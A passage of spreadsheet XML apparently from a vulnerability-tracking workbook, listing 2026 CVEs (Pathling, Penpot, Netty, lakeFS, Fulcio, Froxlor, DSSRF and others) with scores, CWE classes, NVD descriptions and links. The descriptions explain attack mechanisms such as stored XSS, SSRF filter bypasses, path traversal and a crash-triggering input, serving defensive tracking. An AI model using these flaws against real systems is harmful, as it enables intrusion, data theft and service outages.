      <c r="L1130" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's typed CRUD/search/batch FHIR surface allows an authenticated caller with only coarse operation authorities to act on attacker-chosen resource families because those entrypoints do not consistently enforce the documented per-resource `read` and `write` authorities. The documented authorization model requires an operation authority (e.g. `pathling:search`) to be paired with the matching per-resource `read` or `write` authority (e.g. `pathling:read:Patient`). Delete and batch are documented to require write authority for all referenced resource types. However, typed search, update, and related handlers are annotated only with `@OperationAccess(...)` and act on the provider-selected resource type without checking the corresponding per-resource authority. This is fixed in Pathling Server 2.0.0.</t>
        </is>
      </c>
      <c r="M1130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47662</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47663</t>
        </is>
      </c>
      <c r="C1131" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1131" s="5" t="inlineStr"/>
      <c r="F1131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1131" s="5" t="inlineStr"/>
      <c r="H1131" s="5" t="inlineStr"/>
      <c r="I1131" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1131" s="5" t="inlineStr"/>
      <c r="K1131" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="L1131" s="5" t="inlineStr">
        <is>
          <t>Pathling is a set of tools that make it easier to use FHIR and clinical terminology within health data analytics. Prior to version 2.0.0 of Pathling Server, Pathling's typed CRUD/search/batch FHIR surface allows an authenticated caller with only coarse operation authorities to act on attacker-chosen resource families because those entrypoints do not consistently enforce the documented per-resource `read` and `write` authorities. The documented authorization model requires an operation authority (e.g. `pathling:search`) to be paired with the matching per-resource `read` or `write` authority (e.g. `pathling:read:Patient`). Delete and batch are documented to require write authority for all referenced resource types. However, typed search, update, and related handlers are annotated only with `@OperationAccess(...)` and act on the provider-selected resource type without checking the corresponding per-resource authority. This is fixed in Pathling Server 2.0.0.</t>
        </is>
      </c>
      <c r="M1131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47663</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47665</t>
        </is>
      </c>
      <c r="C1132" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1132" s="5" t="inlineStr"/>
      <c r="F1132" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1132" s="5" t="inlineStr"/>
      <c r="H1132" s="5" t="inlineStr"/>
      <c r="I1132" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1132" s="5" t="inlineStr"/>
      <c r="K1132" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1132" s="5" t="inlineStr">
        <is>
          <t>Penpot is an open-source design and prototyping platform. In versions up to and including 2.14.3, Penpot is vulnerable to stored cross-site scripting through file comments, whose content is stored as raw text and rendered into the page with innerHTML without any sanitization. Because the backend applies only a length check and the frontend writes comment content directly through innerHTML, any team member who can comment on a shared file can embed HTML such as an image error handler or script that executes in the browser of every other collaborator. The attack is passive: any user who opens the comments panel on the affected file triggers script execution on the Penpot origin, allowing theft of session cookies, actions performed as the victim, and access to their files and projects. This issue is fixed in version 2.15.3.</t>
        </is>
      </c>
      <c r="M1132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47665</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47683</t>
        </is>
      </c>
      <c r="C1133" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1133" s="5" t="inlineStr"/>
      <c r="F1133" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1133" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1133" s="5" t="inlineStr"/>
      <c r="I1133" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J1133" s="5" t="inlineStr"/>
      <c r="K1133" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L1133" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, the bufferAllocLimit enforcement in lib/setup-sandbox.js does not cover Buffer.concat(list, totalLength) or Buffer.from(arrayLike) with an attacker-controlled length, allowing sandbox code to perform large synchronous host external-memory allocations that bypass the configured cap and can exhaust the host process. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M1133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47683</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47879</t>
        </is>
      </c>
      <c r="C1134" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1134" s="5" t="inlineStr"/>
      <c r="F1134" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1134" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H1134" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_cloud_gateway</t>
        </is>
      </c>
      <c r="I1134" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1134" s="5" t="inlineStr"/>
      <c r="K1134" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1134" s="5" t="inlineStr">
        <is>
          <t>Spring Cloud Gateway JsonToGrpcGatewayFilterFactory allows arbitrary Spring Resource locations for defining the proto descriptor.
Spring Cloud Gateway 5.0.0 - 5.0.2
Spring Cloud Gateway 4.3.0 - 4.3.5
Spring Cloud Gateway 4.0.0 - 4.2.9
Spring Cloud Gateway 3.1.13 and earlier</t>
        </is>
      </c>
      <c r="M1134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47879</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48006</t>
        </is>
      </c>
      <c r="C1135" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1135" s="5" t="inlineStr"/>
      <c r="F1135" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1135" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1135" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1135" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1135" s="5" t="inlineStr"/>
      <c r="K1135" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="L1135" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the RedisArrayAggregator handler permanently leaks pooled direct-memory buffers when a Redis pipeline connection closes before a RESP array aggregate completes. The handler retains child messages in per-handler state (`depths` field) but defines no `channelInactive`, `handlerRemoved`, or `exceptionCaught` method to release them when the pipeline tears down. Because the leaked buffers are slices of `PooledByteBufAllocator` chunks, they prevent those chunks from being returned to the JVM-wide direct-memory pool. Repeated connection churn by any network peer monotonically drains this shared pool, eventually causing allocation failures on all Netty channels in the process. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48006</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48026</t>
        </is>
      </c>
      <c r="C1136" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1136" s="5" t="inlineStr"/>
      <c r="F1136" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1136" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1136" s="5" t="inlineStr"/>
      <c r="I1136" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J1136" s="5" t="inlineStr"/>
      <c r="K1136" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1136" s="5" t="inlineStr">
        <is>
          <t>lakeFS is an open-source tool that transforms object storage into a Git-like repositories. Prior to version 1.81.1 of the open source edition and 1.84.0 of the enterprise edition, lakeFS Web UI renders markdown files from repository objects without sanitizing the resulting HTML. A user with write access to any repository branch can commit a `.md` object containing arbitrary HTML/JavaScript. Any other user who opens that object, or who navigates to a repository or directory containing a malicious `README.md`, executes the attacker-supplied script in their own authenticated session. lakeFS fixes the issue in v1.81.1 and lakeFS Enterprise fixes the issue in in v1.84.0. Enterprise customers using older versions can temporarily disable Markdown rendering by adding YAML to their config. No workaround exists for OSS release. Users are advised to upgrade to the latest version for both lakeFS and lakeFS-Enterprise.</t>
        </is>
      </c>
      <c r="M1136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48026</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48059</t>
        </is>
      </c>
      <c r="C1137" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1137" s="5" t="inlineStr"/>
      <c r="F1137" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1137" s="5" t="inlineStr"/>
      <c r="H1137" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I1137" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J1137" s="5" t="inlineStr"/>
      <c r="K1137" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-401</t>
        </is>
      </c>
      <c r="L1137" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path — no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M1137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48059</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48813</t>
        </is>
      </c>
      <c r="C1138" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1138" s="5" t="inlineStr"/>
      <c r="F1138" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1138" s="5" t="inlineStr"/>
      <c r="H1138" s="5" t="inlineStr"/>
      <c r="I1138" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1138" s="5" t="inlineStr"/>
      <c r="K1138" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L1138" s="5" t="inlineStr">
        <is>
          <t>Flawfinder is a a static analysis tool for finding vulnerabilities in C/C++ source code. Versions prior to 2.0.20 have an improper input neutralization issue leading to output manipulation, specifically, Terminal/ANSI Escape Sequence Injection and XML Injection. A malicious file whose name contains ANSI escape sequences can end up being included in flawfinder's standard terminal output, with many effects. Untrusted fields (such as filenames, categories, or code context text) were not properly sanitized when generating structured reports. An attacker could exploit this to corrupt CSV formats or inject arbitrary XML attributes into SonarQube outputs via output_sonar(). It impacts those who use flawfinder to evaluate intentionally malicious filenames or file contents. This issue has been fully patched in Version 2.0.20 (released 2026-05-16). There is no configuration-based workaround within older versions of flawfinder. If an immediate upgrade is not possible, users can mitigate the risk by pre-scanning filenames, inspecting raw output, and/or restricting untrusted inputs.</t>
        </is>
      </c>
      <c r="M1138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48813</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49478</t>
        </is>
      </c>
      <c r="C1139" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1139" s="5" t="inlineStr"/>
      <c r="F1139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1139" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H1139" s="5" t="inlineStr"/>
      <c r="I1139" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1139" s="5" t="inlineStr"/>
      <c r="K1139" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1139" s="5" t="inlineStr">
        <is>
          <t>Fulcio is a certificate authority for issuing code signing certificates for an OpenID Connect (OIDC) identity. Versions through 1.8.5 improperly follow cross-host redirects and attach Kubernetes ServiceAccount tokens during OIDC discovery, allowing a malicious or compromised issuer to perform blind SSRF, substitute and cache malicious JWKS keys, or disclose ServiceAccount tokens to external hosts. Version 1.8.6 blocks cross-host redirects, restricts token injection, and restricts local token loading. No known workarounds are available.</t>
        </is>
      </c>
      <c r="M1139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49478</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52736</t>
        </is>
      </c>
      <c r="C1140" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1140" s="5" t="inlineStr"/>
      <c r="F1140" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1140" s="5" t="inlineStr"/>
      <c r="H1140" s="5" t="inlineStr"/>
      <c r="I1140" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1140" s="5" t="inlineStr"/>
      <c r="K1140" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="L1140" s="5" t="inlineStr">
        <is>
          <t>ZEBRA is a Zcash node written entirely in Rust. Prior to 4.5.0, a remote unauthenticated P2P peer can stall a Zebra node by racing an invalid block body against the valid canonical body for the same block header hash. ZIP-244 permits the attacker to mutate coinbase scriptSig authentication data while retaining the transaction identifiers, merkle root, and block header hash, so the poisoned body fails later commitment validation but shares the canonical hash. In zebra-state/src/service.rs, queue_and_commit_to_non_finalized_state recorded the hash in non_finalized_block_write_sent_hashes before contextual validation completed and did not remove it when the write task rejected the body. When the honest body later arrived, the cached hash caused KnownBlock::WriteChannel duplicate handling to suppress it, leaving the node stuck one height behind until restart or reorganization. This issue is fixed in version 4.5.0.</t>
        </is>
      </c>
      <c r="M1140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52736</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53453</t>
        </is>
      </c>
      <c r="C1141" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1141" s="5" t="inlineStr"/>
      <c r="F1141" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1141" s="5" t="inlineStr"/>
      <c r="H1141" s="5" t="inlineStr"/>
      <c r="I1141" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1141" s="5" t="inlineStr"/>
      <c r="K1141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1141" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio exposed administrator-intended backend API actions to any authenticated Home Assistant user because the backend did not consistently enforce the panel's admin-only authorization boundary. Affected surfaces included the backend API, upload API, stream routes, terminal WebSocket, Blueprint Studio WebSocket subscriptions, call_service, render_template, global_replace, file and stream access paths, upload handling, and terminal helpers. A non-admin user could invoke arbitrary Home Assistant services, expose Home Assistant state through templates, modify configuration files, access streamed or downloaded configuration content, upload files, or reach terminal-related helpers. These actions could compromise the confidentiality, integrity, and availability of the Home Assistant installation. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M1141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53453</t>
        </is>
      </c>
    </row>
    <row r="1142">
      <c r="A1142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53502</t>
        </is>
      </c>
      <c r="C1142" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1142" s="5" t="inlineStr"/>
      <c r="F1142" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1142" s="5" t="inlineStr"/>
      <c r="H1142" s="5" t="inlineStr"/>
      <c r="I1142" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1142" s="5" t="inlineStr"/>
      <c r="K1142" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1142" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, file_loader decodes percent-encoded path segments after its root-boundary validation, allowing traversal outside FILE_LOADER_ROOT_PATH through watermark or frame filter input. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M1142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53502</t>
        </is>
      </c>
    </row>
    <row r="1143">
      <c r="A1143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53530</t>
        </is>
      </c>
      <c r="C1143" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1143" s="5" t="inlineStr"/>
      <c r="F1143" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1143" s="5" t="inlineStr"/>
      <c r="H1143" s="5" t="inlineStr"/>
      <c r="I1143" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1143" s="5" t="inlineStr"/>
      <c r="K1143" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-248, CWE-400</t>
        </is>
      </c>
      <c r="L1143" s="5" t="inlineStr">
        <is>
          <t>RaTeX is a KaTeX-compatible math rendering engine written in Rust. Prior to version 0.1.11, the public parser entrypoint `ratex_parser::parse(&amp;str)` panics on the 9-byte input `\verbéxé` (i.e. `\verb` followed by the non-ASCII delimiter `é`). When handling a `\verb` command, the parser slices the verbatim argument with byte indices (`arg[1..arg.len() - 1]`); if the delimiter character is multibyte UTF-8, index `1` lands inside that character and Rust panics with *“byte index 1 is not a char boundary”*. Because RaTeX’s release profile sets `panic = "abort"` (`Cargo.toml:48`), the panic aborts the entire process — not just the current request/thread — making this a hard denial of service for any service that renders untrusted LaTeX. Version 0.1.11 fixes the issue.</t>
        </is>
      </c>
      <c r="M1143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53530</t>
        </is>
      </c>
    </row>
    <row r="1144">
      <c r="A1144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53758</t>
        </is>
      </c>
      <c r="C1144" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1144" s="5" t="inlineStr"/>
      <c r="F1144" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1144" s="5" t="inlineStr"/>
      <c r="H1144" s="5" t="inlineStr"/>
      <c r="I1144" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1144" s="5" t="inlineStr"/>
      <c r="K1144" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1144" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, article content is processed by Parsedown without enabling safe mode, which means raw HTML including &lt;script&gt; tags embedded in Markdown is passed through unescaped. The output is rendered with no additional sanitization, resulting in stored XSS visible to all site visitors. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="M1144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53758</t>
        </is>
      </c>
    </row>
    <row r="1145">
      <c r="A1145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53924</t>
        </is>
      </c>
      <c r="C1145" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1145" s="5" t="inlineStr"/>
      <c r="F1145" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1145" s="5" t="inlineStr"/>
      <c r="H1145" s="5" t="inlineStr"/>
      <c r="I1145" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1145" s="5" t="inlineStr"/>
      <c r="K1145" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L1145" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. Prior to 0xc9d4e0dacd937364793278180551e59d93cd43f9, StreamingEscrow.claim() correctly rejects withdrawals while an escrow is disputed, but the permissionless syncOutflow() path performs the same excess-balance transfer without checking disputed. After a streaming proposal is challenged, anyone can call syncOutflow() to transfer escrowed SuperTokens to the proposal beneficiary while the dispute is pending. If the proposal is later rejected, those tokens cannot be recovered by drainToStrategy(). This issue has been patched in 0xc9d4e0dacd937364793278180551e59d93cd43f9.</t>
        </is>
      </c>
      <c r="M1145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53924</t>
        </is>
      </c>
    </row>
    <row r="1146">
      <c r="A1146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54347</t>
        </is>
      </c>
      <c r="C1146" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1146" s="5" t="inlineStr"/>
      <c r="F1146" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1146" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1146" s="5" t="inlineStr"/>
      <c r="I1146" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1146" s="5" t="inlineStr"/>
      <c r="K1146" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1146" s="5" t="inlineStr">
        <is>
          <t>Froxlor is open source server administration software. Prior to 2.3.8, DNS TXT record content accepted by lib/Froxlor/Api/Commands/DomainZones.php can contain HTML special characters, lib/Froxlor/UI/Callbacks/Text.php returns the content from Text::wordwrap without HTML escaping, and templates/Froxlor/table/table.html.twig renders the callback result with the raw filter. An authenticated customer with DNS editor access can store JavaScript-bearing content in a TXT record. When an administrator views the affected domain's DNS configuration, the payload executes automatically in the administrator's browser session, which can expose session data or perform privileged panel actions. This issue is fixed in version 2.3.8.</t>
        </is>
      </c>
      <c r="M1146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54347</t>
        </is>
      </c>
    </row>
    <row r="1147">
      <c r="A1147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54722</t>
        </is>
      </c>
      <c r="C1147" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1147" s="5" t="inlineStr"/>
      <c r="F1147" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1147" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1147" s="5" t="inlineStr"/>
      <c r="I1147" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1147" s="5" t="inlineStr"/>
      <c r="K1147" s="5" t="inlineStr">
        <is>
          <t>CWE-76</t>
        </is>
      </c>
      <c r="L1147" s="5" t="inlineStr">
        <is>
          <t>DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.4, is_url_safe in src/helpers.ts strips the @ userinfo delimiter with remove_at_symbol_in_string before new URL parses the URL, allowing an attacker-controlled URL to bypass internal-IP validation and cause a client using the original URL to reach an internal service. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="M1147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54722</t>
        </is>
      </c>
    </row>
    <row r="1148">
      <c r="A1148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54729</t>
        </is>
      </c>
      <c r="C1148" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1148" s="5" t="inlineStr"/>
      <c r="F1148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1148" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1148" s="5" t="inlineStr"/>
      <c r="I1148" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1148" s="5" t="inlineStr"/>
      <c r="K1148" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1148" s="5" t="inlineStr">
        <is>
          <t>DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.0.5, is_url_safe can treat localhost as safe when DNS resolver 1.1.1.1 returns NXDOMAIN because dns.resolve4 yields no address and no dns.lookup fallback occurs, allowing server-side request forgery. This issue is fixed in version 1.0.5.</t>
        </is>
      </c>
      <c r="M1148" s="6" t="inlineStr">
